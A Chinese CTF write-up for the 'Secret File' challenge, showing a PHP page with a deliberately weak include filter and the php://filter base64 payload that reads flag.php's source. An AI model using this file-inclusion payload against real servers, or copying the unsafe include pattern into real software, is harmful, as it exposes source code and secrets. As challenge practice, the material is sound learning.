C/C++教程
Secret File
本文主要是介绍Secret File,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
打开之后的界面是
审查元素 之后有个跳转页面 直接跳转 然后
真狗 继续跳转 结果没看明白
尝试bp抓包试一下
发现 有东西
看到代码 进行分析
<html>
<title>secret</title>
<meta charset="UTF-8">
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag放在了flag.php里
?>
</html>
这里边有include 尝试伪协议 找到flag.php
secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php
最后base64解码得到flag
这篇关于Secret File的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
Fetch / Axios学习:入门教程与实战指南11-14
-
Typescript 类型课程入门教程11-14
-
Fetch / Axios课程:初学者必看的网络请求教程11-14
-
Styled-components课程:初学者指南11-14
-
pre-commit 自动化测试课程:入门教程与实践指南11-13
-
什么是AIGC?如何使用AIGC技术辅助办公?11-13
-
Slicm 框架怎么进行用户认证?-icode9专业技术文章分享11-13
-
在查询时将 map_coord 列的值转换为字符串有哪些方法?-icode9专业技术文章分享11-13
-
如何将微信地区改成自定义文案?-icode9专业技术文章分享11-13
-
DNS 缓存存在问题有哪些症状和解决方法?-icode9专业技术文章分享11-13
-
HTTP 状态码(405)-Method Not Allowed是什么意思?-icode9专业技术文章分享11-13
-
HTTP 状态码(500)-Internal Server Error是什么意思?-icode9专业技术文章分享11-13
-
在 Element UI 中无法修改 $confirm 的取消按钮文字是什么原因?-icode9专业技术文章分享11-13
-
unity XR是什么?-icode9专业技术文章分享11-13
-
伴随矩阵是什么?-icode9专业技术文章分享11-13
栏目导航
